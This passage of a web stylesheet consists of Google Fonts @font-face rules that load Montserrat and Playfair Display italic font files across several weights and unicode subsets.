url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, 